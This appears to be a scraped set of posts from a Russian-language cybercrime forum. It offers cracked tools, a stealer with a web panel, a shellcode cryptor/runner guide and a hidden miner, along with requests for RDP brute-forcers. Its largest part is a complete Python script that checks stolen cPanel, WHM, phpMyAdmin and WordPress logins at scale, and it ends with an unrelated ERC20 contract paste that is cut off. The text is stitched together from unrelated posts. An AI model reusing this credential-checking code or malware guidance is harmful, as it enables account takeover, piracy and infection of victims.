![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F2g2fARP6rvC7jZlVDSInCjAxDpF.png&hash=8b1240412df95199c0fc707aab45ca52&return_error=1)
Посмотреть и скачать с Яндекс Диска
![disk.yandex.ru](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) disk.yandex.ru
I'll just leave it here.
Based on the last public plain installer leak. Not rebranded, reskinned, or anyhow someone calls them.
Properly cracked, not like the junk floating around, or the 20.1 version leaked with some patched files packed and obfuscated...
Proof that can be done...
I may think to share or sell.
As of now, this is my first contribution here, so Hi to everyone.
NR
<https://github.com/grishka/Houseclub/releases/download/1.0.8/Houseclub-
release.apk>
Не особо вник что это за чудовище, но так понимаю коннектор в клабхаус,
возможно и без инвайта.
Тестим,отписываемся.
Парни напишите плиз как ставить эту прогу ? Чтобы с одного айпи на пул шли решения
у кого-нибудь есть кряки Fiddler и Burp Suite Professional?
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/SYU2zSAD#HHH1Z9QdFlhgmsK9OuXgiA)
mega.nz
Мануала не будет. Исходы чисто для изучения.
Внутри:
Стиллер
веб панель
anonfiles.com
Есть похожие образы ?
Email Extractor for Windows - программа для сбора Email (почтовых ящиков)с фала, списка файлов на компьютере. Поддерживает форматы файлов: Microsoft Office files (Word, Excel), PDF, Outlook .msg, zip, gzip, bzip2, 7zip, tar, txt. Работает с кодировками Unicode-encoded files (UTF-8, UTF-16, UTF-16 Big). Работает с Файлами Apple Keynote, Pages и Numbers. Парсит как с папок и так и всех входящих в них папок. В результате в один файл можно собрать все почтовые ящики что расположены в разных файлах на вашем компьютере. Кстати по окончанию работы идет автоматическое удаление дубликатов email. Версия полностью пролеченная и проверенная, на оф-сайте за неё вообще просят 100 евро, без 5 центов , смотрите пример работы на видео.
Видео к программе: https://radikal.ru/video/rxG2OeGl71d
Демонстрация:
Сбор email с одного файла формата .sql (база данных).
Сбор email по списку папок.
Сбор email по списку файлов.
You must have at least 70 reaction(s) to view the content.
Ищу взломанную версию и не нашел ссылок на форуме.
Если он у вас есть, пожалуйста, загрузите его сюда для других на форуме.
Здравствуйте ! Ищу последнюю версию брута дедиков RDP Brute (Coded by z668) Version: 1.9.9.4 Multiport эту наверно) у кого есть кряк, можете поделиться? Заранее благодарен. Ну если не бесплатно, пишите в пм, договоримся.
Нужны сайты, где можно арендовать, кроме vast.ai, так как там максимум, который видел 24x4090rtx, а мне нужно минимум 70 таких
Download : https://bayfiles.com/h2E552Xey8/PTAi-4.2.1-Pwn3rzs_7z
Password : **Pwn3rzs
For more follow us at t.me/Pwn3rzs or cyberarsenal.org
Positive Technologies Application Inspector** is the only source code analyzer providing high-quality analysis and convenient tools to automatically confirm vulnerabilities — significantly speeding up the work with reports and simplifying teamwork between security specialists and developers.
Setup :
Install docker :
- sudo apt-get update
- sudo apt-get install ca-certificates curl gnupg lsb-release
- sudo mkdir -m 0755 -p /etc/apt/keyrings
- curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg
- echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
- sudo apt-get update
- Please note that i used a Debian 11 image, the name of the package could be different, but version the same
- sudo apt-get install docker-ce=5:20.10.23~3-0~debian-bullseye docker-ce- cli=5:20.10.23~3-0~debian-bullseye containerd.io docker-buildx-plugin docker-compose-plugin
- sudo groupadd docker
- sudo usermod -aG docker $USER
- Now re-login or do:
- newgrp dockerClick to expand...
Time to install PT Ai :
- sudo ./applicationinspector.4.2.1.18610.run
- Finish setup
- sudo /opt/ptai/latest/bin/ptaictl stop
- sudo mv images-latest.xz /opt/ptai/latest/images/
- sudo /opt/ptai/latest/bin/ptaictl start
- Now login at https://your.server.ip and login as root/rootClick to expand...
TIP :
If you install the linux agent locally or in the same network, make sure to use the hostname as url, instead of the ip
Ex. https://server.home.netClick to expand...
Enjoy !
Screenshots :
Update v2.8.3
-Фикс утилит с вылетом при загрузке логов
-Добавили отстук в Telegram при окончании работы или при нажатии на STOP. (Для настройки данной опции, нужно создать бота в телеграмм, получить его Token а также узнать ID аккаунта получателя в телеграмм)
-Другие мелкие исправления
1. Запустите "BLTools Patcher by L1nc0In.exe"
2. Запустите "BLTools.exe" (не переименовывайте файл, иначе не будет воркать)
3. Нажмите кнопку "LOGIN"
Spoiler: Download
Link1: https://gofile.io/d/6ZnWLP
Link2:
https://www.mediafire.com/file/d4i0hcrm0qm0w92/%5BCRACKED_BY_L1nc0In%5D_BLTools_v2.8.3.rar/file
Кряк взят из TG канала https://t.me/L1nc0In
The solution file is in Cryptor\ThreadContextRunner.sln. Open this and view the two projects. If you wish to change the encryption key, you'll need to change it both in Cryptor and Runner projects.
Right click Cryptor in the solution pane and click "Build". This will build the executable, Cryptor.exe, that will encrypt your shellcode. Run this by: Cryptor.exe C:\Path\To\Shellcode.bin. This generates a new file, encrypted.bin.
Next, right click the Runner project in the Solution Explorer on the right hand side and click "Properties". Go to Resources then add a new File resource. Navigate to the folder where encrypted.bin was generated and add it as a resource. Then, click this new resource in the Solution Explorer and ensure that the Build Action is set to "Embedded Resource".
Now you can rebuild the entire solution. Runner.exe will be generated and should be suitable to run your shellcode when double clicked.
Cабж чем можно чекнуть на валид и вход в систему доступы с брута?
APT_Backdoor_SUNBURSTфайлы внутри хрен знает какие: APT WEB shell supernova: .rsrc, .L2, .reloc, .text ещё эсть: APT_Dropper_Win64_TEARDROP
Просьба разобрать какой софт выбрать. Готов купить
Здравствуйте. Я думал, кто-то может найти это полезным. Конкурент программного
обеспечения Datacol. Это действительно хорошо на мой взгляд, и легко в
использовании.
Сайт: Сайт: https://www.heliumscraper.com/
Скачать: https://www.heliumscraper.com/eng/download.php
Как обычно, залатанный мной.
Просто загрузите пробную версию и установите
Программа находится в %LOCALAPPDATA%, но ее можно переместить в другое
расположение. Просто запустите программу и найдите исполняемый файл в
ProcessHacker.
Замените основной исполняемый файл вложенным в него файлом.
Готово.
Если тебе нравится, не покупай. Скачать здесь
Извините за мой русский, я пытаюсь учиться и теперь помогаю со словарем.
/NR
В названии
**В майнере можно использовать сразу несколько алгоритмов например xmr и etc.
Самый главный плюс майнера - загрузка в память майнеров(процесс практически
невозможно отследить)
Все функции работают исправно. По пути к майнере не должно быть русских символов.
Функционал:**
Дополнительный функционал:
Инструкция:
Значение некоторых функций:
Virustotal
[HybridAnalysis](https://www.hybrid-
analysis.com/sample/39bea0988f2003a329e6f2b364ff278dde09a59713a7efa6e42db40ad53ac9a6)
P.s От греха запускайте на виртуалке или в песке
Hidden content for authorized users.
pwd - xss
В поисках скрипта способного выгружать из censys/zoomeye больше лимита с помощью нескольких учетных записей.
1. Актуально на сей день такое?
2. Видел где то кто-то выкладывал, поделитесь ссылкой ещё раз.
Спасибо!
Если вам нужно зарегистрироваться на сомнительном сайте, но не хотите давать основную почту, то используйте сервисы временной почты.
Сервис Mohmal
К примеру сервис Mohmal (www.mohmal.com/ru) -
не реклама
Выдается временная почта на 45 минут:
Проверка на работоспособность:
Сервис Temp-Mail
Cервис: temp-mail.org/en/ - не реклама
**Почта выдается на 25 минут, почту выбираете рандомную.
Проверка на работоспособность:
Эти два сервиса оказались 100% рабочими на данный момент, пользуйтесь.**
Всем пока!
Недавно увидел тему с чекером API binance и кукоина за 10к$ и приохуел. Даже
оправдания тса по типу "ТАМ МНОГОПОТОЧНОСТЬ!!!!", "ДАННЫЕ ОБНОВЛЯЮТСЯ В
ЛАЙВЕ!!" и тд никак не оправдывают цены. Я могу написать такой чекер абсолютно
с таким же функционалом за 700-800$.
Так вот, нужно ли это делать, и какие еще чекеры могут быть нужны рынку?
Если тема не в нужном месте. просьба перенести.
Hello everyone
[LIKES = 2] https://anonfile.com/P1l0B044nb/keyword_zip
](https://anonfile.com/wcT8Cem1b6/Keyword_Generator_v1.0_zip)
anonfile.com
](https://anonfile.com/j3N4Qej4bd/Keyword_Generator_v1.0_zip)
anonfile.com
](https://anonfile.com/E11dP0gbb6/MineCraft_KeyWord_rar)
anonfile.com
](https://anonfile.com/z7lcL3sab8/Keyword_Generator_v1.0_zip)
anonfile.com
](https://anonfile.com/K3w11etab6/keyword_Netflix_txt)
anonfile.com
](https://anonfile.com/aes4z3q2n2/_1400_privet_keyword_txt)
anonfile.com
](https://anonfile.com/l7ZdD806nc/Keyword_for_LOL_Fortnite_zip)
anonfile.com
](https://anonfile.com/V47et3vcb2/Keyword_Scraper_-_by_xRisky_rar)
anonfile.com
https://anonfile.com/obG0X8u7bf/Keyword_Scraper_-_by_xRisky_rar
](https://anonfile.com/T9Udl8xbn2/Keyword_Origin_2019-2020_zip)
anonfile.com
](https://anonfile.com/EcU7l7xan1/Keyword_NORD_VPN_2019-2020_zip)
anonfile.com
](https://anonfile.com/X3N0NcV7m5/HQ_keywords_by_Dark_rar)
anonfile.com
](https://anonfile.com/B5udVfb5n9/Keywords_rar)
anonfile.com
](https://anonfile.com/i5S45629nd/HQ_keywords_zip)
anonfile.com
anonfile.com
](https://anonfile.com/W4v8h1t6b7/keywords_generator_zip)
anonfile.com
](https://anonfile.com/S9Vcl4x5ne/KeyWords_PSN_Private_2019-2020_zip)
anonfile.com
](https://anonfile.com/60Qblfx0nd/KeyWords_vpn_2019_2020_zip)
anonfile.com
](https://anonfile.com/x9i6f3Fene/keywords_rar)
anonfile.com
_ SQLI Dumper.rar - AnonFiles ](https://anonfile.com/6b9cI9X4m5/Fortnite_HQ_Combos_Keywords_and_Dorks_Cracking_Full_In_Depth_Tutorial_SQLI_Dumper_rar)
anonfile.com
](https://anonfile.com/R4Vel6xfnf/KeyWords_PSN_Premium_HQ_2019_zip)
anonfile.com
](https://anonfile.com/A9S285o7b9/Keywords_for_gaming_accounts_txt)
anonfile.com
](https://anonfile.com/g1q011w2b4/Roblox_Keywords_txt)
anonfile.com
](https://anonfile.com/58P8l7xcn9/KeyWords_Netflix_2019_2020_zip)
anonfile.com
](https://anonfile.com/Bfy0T0Sam1/HQ_Dominos_Keywords_by_Server_txt)
anonfile.com
https://anonfile.com/bfK2tef1b8 [/LIKES]
Mates few more parts are there
Софт написан на Python и компилирован в C для вашего удобства
Находит подтвержденные Bip-39 фразы - 12 / 15 / 18 / 24 слов
Самая быстрая скорость работы сбора из всех приват что я видел
Возможность ввести лог названия файлов / копировать файлы найденных фраз
Поддерживает все текстовые форматы файлов с кодировкой аналoгичной utf-8
Если решите отблагодарить (btc) -
bc1qgwqsmjqdvufy08hfuzamuff5spvz7u4qnjtwlza2c6aqjv30resq0vu57k
Скачать - https://www.sendspace.com/file/0bq392
VT -
https://www.virustotal.com/gui/file...5d25bbfd806cc74f5b94b2e7a4dbea79135/detection
Кодер MrWhoer
1)HashSort
Для работы необходим питон версии 3.0. Работает только с форматом
mail(login):hash . Регулярки позаимствованы у Guron_18
2)Merge
Склейка списка hash:pass после расшифровки с списком mail:hash. Поддерживает
соли. Интерфейс интуитивный.Работает быстрее любого аналога.
3)Сортировщик паролей
Сортирует файл с паролями на категории
https://prnt.sc/tu0qxw
Из минусов,реализовано все регулярками,потому скорость не очень. МБ кому
пригодится.
https://www.virustotal.com/gui/file...5a63aab0e7170e2fa2810a88ba7691711ff/detection
[https://www.virustotal.com/gui/file...TY4M2ZkZDg2ZGU1OGE6MTU5NjU2NzA1Ng==/detection](https://href.li/?https://www.virustotal.com/gui/file-
analysis/NGZiODVjYTUwZGNlY2U0ZjFkOTY4M2ZkZDg2ZGU1OGE6MTU5NjU2NzA1Ng==/detection)
Pass: Lynther
You must have at least 20 reaction(s) to view the content.
В названии.
Написал простенький валидатор для админок
cpanel/whm/phpmyadmin чекаются без проблем
wordpress с косяками
Позже планирую немного почистить код и исправить баги
Использование:
1. Кладем наши txt файлы рядом с main.py
- названия файлов не имеют значения
- количество файлов любое
- формат строк:
URL: domain
USER: user
PASS: passClick to expand...
2. Устанавливаем зависимости:
tldextract
aiohttpClick to expand...
3. Запускаем скрипт и ждем
Примечание:
1. Результаты сохраняются в results/output.txt
2. Если чек через тор или просто хуевый интрнет, лучше снизить значение
семафора до 20-50
Spoiler: Работа:
Spoiler: Код:
Python:Copy to clipboard
import ipaddress
import aiohttp
import asyncio
import html
import re
import os
from dataclasses import dataclass
from tldextract import tldextract
@dataclass
class SortData():
total = 0
uniq = 0
double = 0
local = 0
unknown = 0
errors = 0
logins = []
def sort(data: list[tuple[str, list[str]]]) -> SortData:
output = SortData()
reply = set()
for file in data:
filename, lines = file
for i in range(len(lines)):
if not lines[i].startswith('URL: '):
continue
try:
url = lines[i].split()[-1]
# убираем хвостик у wordpress линков
if 'wp-admin' in url and (not url.endswith('wp-admin')):
url = url.rsplit('/', 1)[0]
user = "".join(lines[i+1].split().pop(-1))
pswd = "".join(lines[i+2].split().pop(-1))
except (IndexError, ValueError):
output.errors += 1
continue
output.total += 1
# убираем локальные ip и домены
parts = tldextract.extract(url)
if not parts.suffix:
if not global_ip(parts.ipv4):
output.local += 1
continue
if user == "UNKNOWN":
output.unknown += 1
continue
auth = (url, user, pswd, filename)
if auth in reply:
output.double += 1
continue
reply.add(auth)
output.logins.append(auth)
output.uniq += 1
return output
def global_ip(server: str) -> bool:
try:
ipAddrs = ipaddress.ip_address(server)
if ipAddrs.is_global:
return True
return False
except ValueError:
return False
class Check():
def __init__(self, logins) -> None:
self.logins = logins
self.valid = open('results/output.txt', 'w+')
self.cpa_count = 0
self.whm_count = 0
self.pma_count = 0
self.wpa_count = 0
self.sem = asyncio.BoundedSemaphore(250)
self.loop = asyncio.new_event_loop()
self.loop.run_until_complete(self.execute())
async def execute(self):
tasks = []
for login in self.logins:
await asyncio.sleep(1)
task = asyncio.ensure_future(self.connect(login))
tasks.append(task)
await asyncio.gather(*tasks)
def service(self, http: str) -> str | None:
if 'cpanel login' in http:
return 'cpa'
elif 'whm login' in http:
return 'whm'
elif 'wordpress' and 'type="text" name="log"' in http:
return 'wpa'
elif 'phpmyadmin' or 'login into database' in http:
return 'pma'
async def connect(self, login: list[str]):
try:
await self.sem.acquire()
url, user, pswd, src = login
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
'Accept': 'text/plain'
}
jar = aiohttp.CookieJar(unsafe=True)
async with aiohttp.ClientSession(headers=headers,
requote_redirect_url=True, cookie_jar=jar,
connector=aiohttp.TCPConnector(ssl=False)) as session:
async with session.get(url, timeout=5) as resp:
cookies = session.cookie_jar.filter_cookies(url)
http = await resp.text()
service = self.service(http.lower())
if service in ['cpa', 'whm']:
params = {'login_only': '1'}
async with session.post(resp.url, auth=aiohttp.BasicAuth(user, pswd), params=params, timeout=5) as resp:
if resp.status == 200:
if service == 'cpa':
self.cpa_count += 1
self.valid.write(f"cpa|{url}|{user}|{pswd}\n")
print(f'[cpa] url: {url} user: {user} pass: {pswd}')
elif service == 'whm':
self.whm_count += 1
self.valid.write(f"whm|{url}|{user}|{pswd}\n")
print(f'[whm] url: {url} user: {user} pass: {pswd}')
elif service == 'pma':
data = {
'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", http, re.I).group(1)),
'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", http, re.I).group(1)),
'pma_username': user,
'pma_password': pswd,
}
async with session.post(resp.url, data=data, cookies=cookies, timeout=5) as resp:
cookies = session.cookie_jar.filter_cookies(resp.url)
if 'pmaAuth-1' in cookies:
self.pma_count
self.valid.write(f"pma|{url}|{user}|{pswd}\n")
print(f'[pma] url: {url} user: {user} pass: {pswd}')
elif service == 'wpa':
headers = {
'Cookie': 'wordpress_test_cookie=WP+Cookie+check'
}
data = {
'log': user,
'pwd': pswd,
'wp-submit': 'Accept',
'redirect_to': url,
'testcookie': 1
}
new_url = url.replace('wp-admin', 'wp-login.php')
async with session.post(new_url,
data=data, headers=headers,
allow_redirects=False, timeout=5) as resp:
if resp.status in [301, 302]:
self.wpa_count += 1
self.valid.write(f"wpa|{url}|{user}|{pswd}\n")
print(f'[wpa] url: {url} user: {user} pass: {pswd}')
except Exception:
pass
finally:
self.sem.release()
def main():
print(f"[i] coded for xss.is by Encommerce!")
data = []
files = os.listdir()
for file in files:
if not file.endswith('.txt'):
continue
try:
lines = open(file, encoding='utf-8').readlines()
except UnicodeDecodeError:
print(f'{file}: file is not utf-8')
continue
count = len(lines)
if count < 3:
continue
print(f'[+] file: {file}, lines: {count}')
data.append((file, lines))
if not data:
print(f'[-] no files avalible')
return
sorted = sort(data)
if not sorted.uniq:
print(
f'[-] no uniq\n'\
f' >> total count: {sorted.total}\n'\
f' >> local hosts: {sorted.local}\n'\
f' >> double count: {sorted.double}\n'\
f' >> unknown auth: {sorted.unknown}\n'\
f' >> format errors: {sorted.errors}'
)
return
print(
f'[+] > uniq: {sorted.uniq}\n'\
f' > total count: {sorted.total}\n'\
f' > local hosts: {sorted.local}\n'\
f' > double count: {sorted.double}\n'\
f' > unknown auth: {sorted.unknown}\n'\
f' > format errors: {sorted.errors}\n'\
f'[+] validation...'
)
result = Check(sorted.logins)
print(
f"[+] > task completed:\n"\
f" > cpa: {result.cpa_count}\n"\
f" > whm: {result.whm_count}\n"\
f" > pma: {result.pma_count}\n"\
f" > wpa: {result.wpa_count}\n"\
f"[i] support the author!\n"\
f"[btc] bc1qzzghv2epe3e22waqmyqy4g6fapg2xlxqe2ptey"
)
if __name__ == "__main__":
main()
Сообщение от модератора: удалил ссылки и код из-за возможных рисков.
Бесплатный Seed Parser [v.0.1.0]
Написан мною на расте, чекает очень быстро на SSD.
Перетащить папку или файл на exe файл и работа начнется.
VT 2 детекта
(https://www.virustotal.com/gui/file...054b7a7c6a7166b3ba69a6622e652ffb5b6?nocache=1)
на эту версию, ругается из за отсутствия сертификата при компиляции. Не
скачивайте и не запускайте в других местах, кроме как отсюда c канала.
Буду выпускать обновы по мере необходимости, пишите пожелания
JavaScript:Copy to clipboard
/**
*Submitted for verification at BscScan.com on 2022-11-07
*/
// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/utils/Context.sol
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
// File: @openzeppelin/contracts/access/Ownable.sol
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)
pragma solidity ^0.8.0;
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions anymore. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby removing any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v4.7.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* The default value of {decimals} is 18. To select a different value for
* {decimals} you should overload it.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless this function is
* overridden;
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual override returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(
address from,
address to,
uint256 amount
) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function _transfer(
address from,
address to,
uint256 amount
) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
}
_balances[to] += amount;
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
_balances[account] += amount;
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
}
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
